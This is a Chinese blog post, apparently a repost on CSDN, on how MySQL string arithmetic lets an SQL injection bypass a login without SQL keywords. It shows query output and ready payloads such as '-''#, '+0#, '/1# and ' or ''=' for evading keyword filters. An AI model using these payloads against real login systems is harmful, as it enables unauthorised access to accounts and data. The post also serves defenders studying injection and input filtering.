mysql 字符串运算_使用MySQL字符串运算实施精巧化SQL注入攻击

最新推荐文章于 2024-03-29 14:48:37 发布
最新推荐文章于 2024-03-29 14:48:37 发布
阅读量96 收藏
点赞数
文章标签: mysql 字符串运算
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39888082/article/details/113273157
版权

我们先来看这样一个场景。

有以下表结构:

mysql> desc admin;

+----------+--------------+------+-----+---------+----------------+

| Field | Type | Null | Key | Default | Extra |

+----------+--------------+------+-----+---------+----------------+

| id | mediumint(9) | NO | PRI | NULL | auto_increment |

| name | char(32) | NO | UNI | NULL | |

| password | char(32) | NO | UNI | NULL | |

+----------+--------------+------+-----+---------+----------------+

3 rows in set (0.00 sec)

执行select * from admin;,成功返回所有记录内容。

+----+--------+----------------------------------+

| id | name | password |

+----+--------+----------------------------------+

| 1 | admin | c6dabaeeb05f2bf8690bab15e3afb022 |

| 2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 |

| 4 | n00b | ff80e8508d39047460921792273533a4 |

+----+--------+----------------------------------+

3 rows in set (0.00 sec)

执行select * from admin where name='';,没有匹配到任何记录。

mysql> select * from admin where name = '';

Empty set (0.00 sec)

那么我们来执行select * from admin where name = ''-'';

+----+--------+----------------------------------+

| id | name | password |

+----+--------+----------------------------------+

| 1 | admin | c6dabaeeb05f2bf8690bab15e3afb022 |

| 2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 |

| 4 | n00b | ff80e8508d39047460921792273533a4 |

+----+--------+----------------------------------+

3 rows in set, 3 warnings (0.00 sec)

可以看到,也成功返回了所有记录,但是有三个warnings,我们看下警告信息:

mysql> show warnings;

+---------+------+------------------------------------------

| Level | Code | Message

+---------+------+------------------------------------------

| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin

| Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s

| Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b

+---------+------+------------------------------------------

3 rows in set (0.00 sec)

提示截断了错误的DOUBLE值'admin等等,当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ''-'';看下结果。

mysql> select ''-'';

+-------+

| ''-'' |

+-------+

| 0 |

+-------+

1 row in set (0.00 sec)

返回0,也就是说我们查询的每一行的name子段都会和0做对比,这样就会触发一个类型转换,对name字段转换的结果也必然为0:

mysql> select CAST((select name from admin limit 1,1) as DECIMAL);

+-----------------------------------------------------+

| CAST((select name from admin limit 1,1) as DECIMAL) |

+-----------------------------------------------------+

| 0 |

+-----------------------------------------------------+

1 row in set, 1 warning (0.00 sec)

因此where语句构成了相等的条件,where 0=''='',记录被返回。

7a0c6b5ef404cb2bccb6cf93f307de98.png

如果我们想绕过登录验证,上面已经给出了一个传统的tips:用户名密码均为' or ''=' 这样的逻辑和绕过方式很常见,这里不再具体解释了。

那么通过这次发现的技巧,可以使用一种相当精巧的方式,且避免使用SQL关键字,来绕过登录。

fdb7f94d1074391fc6cb25a2dbc6c211.png

仅仅在name子段输入'-''#,password留空,即可绕过登录验证。

745d2f14ce1c8e5db65df1dd49a6604a.png

除了''-'',其他运算符''+'',''*'',''^''都会有同样的效果。再继续进行测试,我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可

mysql> select ''/1;

+------+

| ''/1 |

+------+

| 0 |

+------+

1 row in set (0.00 sec)

类似的''+0,''-0,''*0,''^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证: '+0#,'/1#,'^0,'-0#等等。

利用这样一种特性,当目标对注入语句中的SQL关键字进行过滤时,便可通过这样一种方式进行Bypass。

weixin_39888082
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql字符串字段判断是否包含某个字符串的2种方法
12-15
MySQL数据库中,处理字符串字段的数据操作是常见的需求。这里我们关注的是如何判断字符串字段是否包含特定的子字符串。在给定的示例中,我们有一个名为`users`的表,其中`emails`字段存储了以逗号分隔的电子邮件...
sqlserver、mysql获取连接字符串步骤
09-10
MySQL Workbench是一款强大的图形工具,可以直接从中获取连接字符串。在“连接”部分填写服务器信息,如主机名、端口、用户名、密码和数据库,然后点击“测试连接”。连接成功后,可以在“连接详情”中查看连接...
mysql 字符串运算符_mysql - 运算
weixin_42511091的博客
01-19 445
select version();################################### 算术运算符 ###################################-- + #加法 #字符串拼接要是用concat-- - #减法-- * #乘法-- / 或 DIV#除法-- % 或 MOD#取余#说明:在除法运算和模运算中,如果除数为0,将是非法除数,返回结果为NULL。#...
mysql 字符串运算符_MYSQL读书笔记---运算符、字符串操作
weixin_34827675的博客
02-18 130
运算符###########################################=,!=(<>),>,>=,流程#############################################mysql> select ifnull(1,0); #如果第一个参数为NULL,则返回第二个参数值,否则返回原值.--------------------...
mysql字符串的逻辑运算和比较运算
zzzgd_666的博客
12-03 1852
mysql字符串的逻辑运算和比较运算一. 数字和数字运算二. 那数字和字符串之间呢?1. 字符串是数字的逻辑运算2. 字符串是英文的逻辑运算3. 各种情况3.1 = 比较运算3.2 and逻辑运算三. 整理总结3.1 比较运算3.2 逻辑运算字符串转数字 一. 数字和数字运算 mysql的逻辑运算, and, or, xor, not等 比如: select 1 and 2; select 1 and 0; 这个相信大家都知道, mysql里面, 数字0表示false, 除了0外的数字表示true. 所
mysql 字符串函数
最新发布
一路向前
03-29 1109
常用的字符串函数有 1,合并函数(CONCAT(),CONCAT_WS(x,s1,s2,…)和group_concat()函数) , 2,大小写(LOWER(str) 小写,UPPER(str) 大写), 3,字符串截取函数SUBSTRING(s,n,len), 4,子串位置匹配函数(LOCATE(str1, str)、POSITION(str1 IN str)和 INSTR(str, str1)), 5,字符串替换函数REPLACE(s,s1,s2), 6,子串位置的函数FIND_IN_SET(s
mysql单引号闭合实战_MySQL单引号引起的严重性能问题
weixin_42514521的博客
02-01 317
最近在工作中遇到一个MySQL update的严重性能问题,语句大概是这样的:update t_user set fstate=0 where fuid in (11111, 22222, ...., .....)in后的括号中,有1000个fuid的样子表结构如下:存储引擎是Innodb, 版本是MySQL 4.0.18其中fuid是主键, 由于表数据量在300W左右,所以刚开始更新很慢,我以...
MySQL拼接字符串函数GROUP_CONCAT详解
01-21
上一篇文章 跨表更新,看到自己写的SQL像个憨憨写了关于跨表个更新的内容。一年过的很快,文中后来的两位员工 馮大 和 馮二 也要面对无情的 KPI 考核了,他们工作干的很不错,performance 分别是 4 和 5 新需求来了...
MySQL动态字符串处理DYNAMIC_STRING
09-09
动态字符串处理在MySQL中有着广泛的应用,例如在构建SQL语句、处理用户输入或者在存储过程中组合数据时。`DYNAMIC_STRING` 提供了一种高效且灵活的方式来管理这些动态变字符串,减少了因字符串长度未知而可能...
SQL注入原理及如何判断闭合符
大大大蜜蜂的博客
09-30 1万+
一、SQL注入原理: 造成SQL注入的原因: 在没有对用户的输入进行过滤、检测的情况下,就把用户输入数据,带入到数据库中执行SQL语句。 利用SQL注入: 由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。 访问网页具体流程图: 在上图中,用户访问实验楼主页进行了如下过程: 1、在 Web 浏览器中输入 www.shiya
SQL注入知识点总结
qq_43332077的博客
12-12 306
SQL注入之过滤,绕过 绕过的方法: 1.大小写变形(混写) 2.编码,hex,urlencode 3.注释 4.过滤替换 5.截断 Less-23 1.通过页面显示,得知数据提交方式为get型 2.测试闭合方式 单引号闭合:页面回显语法错误 双引号闭合:页面回显正确 括号闭合:页面回显正确 我们得知,闭合方式为’ '单引号闭合 插入sql注入语句: 我们发现插入完整的sql语句,页面任...
SQL注入详解
读书 买花 长大
11-12 4202
SQL-sql
SQL注入漏洞基础(三)
qq_59611876的博客
12-16 483
只要这个程序是人写的,那么一定会存在SQL注入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
开单引号闭单引号
ustccw
01-13 3770
开单引号符号记为 ` ,也叫反单引号也称重音符,主要用于计算机相关领域 ASCII值 0x60 ,位于键盘数字1的左边,TAB键的上方。 用法举例:ll `find -name "*.md"` //将所有*.md文件的详细信息展示出来闭单引号符号记为 ’ ,即是通常口头说的单引号,用法广泛。 ASCII值 0x27,位于键盘回车键左边,分号键右边。
MySQL联合注入之字符型注入
m0_50211409的博客
03-27 1723
关于字符型注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符型注入的SQL语句 select*from admin where id='1' 这是字符型注入后的语句 我们在传参的时候 ...
sql注入_1-7_绕过注入
weixin_44110913的博客
12-09 650
文章目录一.sql注入绕过概念二.sql注入绕过手段三.sql绕过演示四.总结 一.sql注入绕过概念 1.为什么要绕过? 因为有时候存在注入,但是很多符号被过滤掉, 所以我们不的不使用绕过手段。 2.绕过就是虽然我们注入时使用字符串或者符号被过滤,但我们依然可以使他报错,并且报出他的数据库表名等 二.sql注入绕过手段 1.注释符 通常是用来注释掉id=1’ 这个单引号,或者字符串 2....
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 5004
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
mysql去除特殊字符 单引号(‘)
热门推荐
Dangerous的博客
05-11 2万+
比如像这样的单引号,去除掉。导入到mysql中以后,用一下语句:UPDATE user_4factors SET mobile=REPLACE(mobile,'\'','')那个单引号需要用 “\”转义一下,不然语法无法识别。
MySQL中的单引号(')和反单引号(`)
zhaoyi666的博客
04-11 1535
最近在写数据库表,在执行MySQL的时候,发现速度很慢。经过一番调试,发现给数据加上单引号以后,速度变得非常快,所以在这里总结一下。 先看看SQL:SELECT tel FROM user WHERE type IN (‘user’, ‘owner’); 在这个SQL中,用反单引号(`)去标注表名、字段名,用单引号(‘)去标注参数。 反单引号的作用是,当表名、字段名为一些保留字的时候,如果不用反...
mysql获取时间转换成字符串类型_MySQL字符串类型转换时间类型
06-09
可以使用MySQL的日期时间函数将时间类型转换为字符串类型。 例如,使用DATE_FORMAT()函数将时间类型转换为字符串类型: ``` SELECT DATE_FORMAT(NOW(), '%Y-%m-%d %H:%i:%s'); ``` 这将返回当前时间的字符串表示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值